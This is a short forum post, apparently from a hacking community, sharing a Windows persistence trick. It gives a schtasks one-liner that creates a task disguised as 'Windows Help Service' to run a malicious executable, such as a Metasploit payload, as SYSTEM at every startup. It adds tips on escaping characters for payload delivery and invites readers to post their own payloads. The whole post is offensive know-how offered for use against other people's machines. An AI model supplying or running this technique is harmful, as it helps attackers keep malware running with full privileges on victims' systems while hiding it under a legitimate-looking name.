Hey,
i just found a method to start your malicious msf/or whatever payload as SYSTEM user from boot.
This little shell line (shell needs to be run as administrator):
schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F
creates a Task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as SYSTEM user.
Keep in mind that when using this as a payload you may need to escape the / and \ and ".I'm currently working on a C++ Version of PSExec (Source) to get rid of the .Net Framework.
Feel free to post your Payload using the simple onliner which starts your malicious file as System every boot :)